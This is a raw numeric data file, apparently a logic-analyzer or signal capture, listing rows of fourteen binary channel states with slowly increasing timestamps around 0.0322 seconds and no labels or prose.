0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190228e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190252e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190276e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2190280e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2190324e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2190352e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,3.2190356e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190360e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190376e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190400e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190428e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190452e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190476e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190500e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190524e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190548e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190576e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190600e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190628e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190652e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2190656e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2190700e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2190724e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190732e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190752e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190776e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190800e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190828e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190852e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190876e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190952e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190976e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191000e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191052e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191076e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191124e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191152e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191204e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191228e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191252e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191276e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191300e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191324e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2191332e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2191376e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2191404e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,3.2191408e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191412e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191428e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191452e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191476e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191500e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191524e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191548e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191604e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191628e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191652e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191676e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191700e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191724e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191748e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191776e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191800e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191828e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191852e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191876e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2191924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2191952e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2191956e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2191976e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2192000e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192008e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192028e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192052e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192076e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192100e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192152e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192176e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192204e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192228e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192276e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192300e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192352e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192376e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192428e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192452e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192476e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192500e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192524e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192548e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192576e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192600e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192628e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192652e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192676e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192700e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192724e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192748e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192776e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192800e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192828e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192852e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192876e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192900e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2192948e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2192976e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2193000e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2193028e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2193052e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2193076e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2193100e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2193124e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2193148e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2193176e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2193200e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2193228e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2193252e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2193276e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2193300e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2193324e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2193348e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2317508e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2317740e-02 1,0,1,0,0,0,0,0,0,0,0,1,0,1,3.2317768e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2317796e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,3.2318088e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2318112e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,3.2318136e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2318164e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,3.2318212e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,1,3.2318236e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,3.2318240e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,1,3.2318284e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,3.2318308e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,1,3.2318316e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2318320e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2318344e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2318364e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2318388e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2318412e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2318436e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2318460e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2318484e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2318492e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2318536e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2318564e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.2318568e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2318572e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2318612e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2318636e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2318660e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2318684e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2318708e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2318736e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2318764e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2318788e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.2318792e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2318796e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2318836e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2318860e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2318884e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2318908e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2318916e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2318964e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2318988e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2318996e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319012e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319036e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319060e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319084e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319108e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319136e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319164e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319188e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319208e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319236e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319260e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319284e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319312e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319336e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319364e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319388e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319436e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319460e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2319468e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2319512e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2319536e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319544e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319588e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319612e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319636e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319660e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319684e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319712e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319736e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319764e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319788e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319812e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319836e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319860e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319884e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319912e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319936e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2319964e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2319988e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320012e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2320036e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320060e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2320084e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320112e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2320116e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2320164e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2320188e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320196e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2320212e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320236e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2320260e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320284e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2320312e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320336e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2320340e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2320388e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2320412e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320420e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2320436e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320460e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2320512e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320536e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2320540e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2320564e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2320588e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.2320592e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320596e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2320612e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320636e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2320660e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320684e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2320692e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2320736e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2320764e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.2320768e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320772e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2320788e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320812e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2320836e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320860e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2320912e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2320936e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2320940e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2320964e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2320988e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2321012e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2321036e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2321060e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2321084e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2321112e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2321136e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.2321140e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2321144e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2321188e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2321212e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2321236e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2321260e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2321284e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2321312e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2321336e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2321364e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2321388e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2321412e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2321436e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2321460e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2321484e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2321512e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2321536e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2321564e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2321588e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2321612e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2321616e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2321660e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2321684e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2321692e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2321736e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2321764e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2321788e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2321812e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2321836e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2321860e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2321884e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2321912e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2321916e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2321964e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2321988e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322012e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322036e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322060e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322084e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322112e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322136e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322164e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,3.2322188e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2322192e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2322236e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2322260e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322268e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322284e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322312e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322336e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322364e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322388e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322412e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322436e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322460e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322484e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322512e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322536e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2322564e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2322612e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2322636e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322644e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322660e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322684e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322712e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322736e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322764e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,3.2322788e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2322792e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2322836e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2322860e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322868e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2322912e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2322936e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2322940e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2322964e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2322988e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2323012e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2323036e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2323060e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2323084e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323092e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2323140e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323164e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2323188e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323212e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2323216e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2323260e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2323284e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323292e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2323312e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323336e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2323364e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323388e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2323436e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323460e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2323468e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2323484e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2323512e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323516e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2323536e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323564e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2323588e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323612e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2323636e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323660e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2323684e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323712e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2323764e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323788e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2323792e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2323836e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2323860e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323868e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2323912e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323936e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2323964e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2323988e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324012e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324036e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,3.2324040e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2324044e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2324084e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2324112e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.2324116e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324120e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324164e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324188e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2324192e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2324212e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2324236e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2324260e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2324284e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2324312e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2324336e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.2324340e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324344e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324388e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324412e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324436e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324460e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324484e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324512e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324536e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324564e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324588e-02 